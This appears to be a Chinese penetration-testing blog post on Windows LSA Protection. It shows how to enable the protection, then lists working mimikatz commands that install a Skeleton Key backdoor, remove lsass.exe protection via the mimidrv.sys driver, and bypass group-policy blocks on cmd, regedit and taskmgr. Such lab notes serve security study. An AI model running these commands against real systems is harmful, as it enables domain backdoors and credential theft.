域渗透-LSA Protection

简介:
微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。
微软官方文档: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn408187(v=ws.11)
 
适用系统:
Windows 8.1
Windows Server 2012 R2
 
接下来换用 Windows Server 2012 R2 进行测试
(1)配置 LSA Protection
注册表位置:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
新建-DWORD(32)值,名称为 RunAsPPL,数值为 00000001,重启系统生效。
 
(2)测试 Skeleton Key
mimikatz 命令:
privilege::debug
misc::skeleton
未配置LSA Protection时不会报错。
配置LSA Protection时失败报错:
 
(3)绕过 LSA Protection
mimikatz 早在 2013 年 10 月就已支持绕过 LSA Protection
 
注:该功能需要 mimidrv.sys 文件
 
mimikatz 命令:
privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton
如图,导入驱动文件mimidrv.sys后,绕过 LSA Protection,操作成功
关闭LSA Protection,将RunAsPPL的值改为0重启计算机即可。
 
3.补充
一些常见问题的解决方法,管理员常常会禁用一些重要程序的运行,比如 cmd、regedit、taskmgr等
1、如何禁用 cmd、regedit、taskmgr
输入 gpedit.msc 进入本地组策略编辑器
本地计算机策略-用户配置-管理模板-系统
 
禁用 cmd:
选择"阻止访问命令提示符"-编辑---启用
组织命令提示符启用。
测试:命令提示符已被管理员停用。
 
禁用 regedit:
选择阻止访问注册表编辑工具"-编辑-启用
禁用 Windows 注册表编辑器 Regedit.exe。
测试:注册表编辑器已被管理员禁用。
 
禁用 taskmgr:
选择"不要运行指定的 Windows 应用程序"-不允许的应用程序列表-填入 taskmgr.exe-启用。
防止 Windows 运行在此设置中指定的程序。
测试:用户无法运行已添加到不允许的应用程序列表的程序。
经测试 cmd、regedit、taskmgr 均已被禁用。
 
2、绕过
mimikatz 命令:
privilege::debug
misc::cmd
misc::regedit
misc::taskmgr
 
 
成功执行,绕过限制。
 
做自己想做的,不要活给别人看。
 

你可能感兴趣的:(域渗透-LSA Protection)